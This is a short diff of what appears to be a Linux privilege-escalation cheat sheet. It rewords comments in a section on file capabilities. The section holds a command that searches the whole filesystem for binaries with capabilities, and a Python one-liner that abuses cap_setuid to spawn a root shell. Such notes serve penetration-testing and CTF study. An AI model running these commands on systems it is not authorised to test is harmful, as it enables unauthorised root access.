 Capabilities

-# Find binaries with capabilities
+# Find binaries with special capabilities assigned

 getcap -r / 2>/dev/null

-# cap_setuid — change UID to root
+# cap_setuid — allows changing UID to root

 python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'